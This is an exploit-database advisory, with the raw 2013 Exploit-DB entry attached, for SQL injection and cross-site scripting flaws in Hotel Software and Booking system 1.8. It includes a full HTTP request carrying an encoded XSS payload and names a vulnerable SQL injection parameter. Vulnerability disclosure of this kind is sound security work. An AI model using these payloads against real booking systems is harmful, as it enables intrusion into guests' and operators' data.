Hotel Software and Booking system 1.8 - SQL Injection / Cross Site Scripting

vendor:

Hotel Software and Booking system

by:

Dylan Irzi

8,8

CVSS

HIGH

SQL Injection and Cross Site Scripting

89, 79

CWE

Product Name: Hotel Software and Booking system

Affected Version From: 1.8

Affected Version To: 1.8

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Win8 & Linux Mint

2013

Hotel Software and Booking system 1.8 – SQL Injection / Cross Site Scripting

A vulnerability exists in Hotel Software and Booking system 1.8 which allows an attacker to inject malicious SQL commands and Cross Site Scripting payloads into the application. The vulnerable files are http://localhost/cbadm/reservations/index.php?ac=search and http://localhost/cbadm/clients/edit_client.php?id=1. The PoC for Cross Site Scripting is http://server/cbadm/reservations/index.php?ac=search with the payload s=%22%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28%2FXSS%2F%29%3B%3E%3E&button2=search&ss=ok.

Mitigation:

Input validation and sanitization should be implemented to prevent SQL Injection and Cross Site Scripting attacks.

Source

Exploit-DB raw data:

###########################################################################################
# Exploit Title: Hotel Software and Booking system 1.8 - SQL Injection /
Cross Site Scripting
# Date: 21 de Agosto del 2013
# Exploit Author: Dylan Irzi
# Credit goes for: websecuritydev.com
# Vendor Homepage: http://www.cbhotel.eu/
# Tested on: Win8 & Linux Mint
# Affected Version : 1.8 & Anteriores.
# Contacts: { https://twitter.com/Dylan_irzi11 , http://websecuritydev.com/}
# Greetz: All team WebSecuritydev, SeguridadBlanca (Dedalo)
###########################################################################################

*Cross Site Scripting:*
Archivos Afectados Afectados

http://localhost/cbadm/reservations/index.php?ac=search
-------------------------------------------------------------------
PoC:
*Cross Site Scripting Post.*
URL: http://server/cbadm/reservations/index.php?ac=search

Host: server
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0 AlexaToolbar/alxf-2.18
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://demo.cbhotel.eu/cbadm/adm_main.php
Cookie: PHPSESSID=flp86mf2huj240qp6hj34ojgp3
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 87
-------------------------------------------------------------------
s=%22%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28%2FXSS%2F%29%3B%3E%3E&button2=search&ss=ok
-------------------------------------------------------------------
*SQL Injection*

http://localhost/cbadm/clients/edit_client.php?id=1(SQL Injection)


*By Dylan Irzi
@Dylan_Irzi11
Pentest de Seguridad.
WhiteHat.
*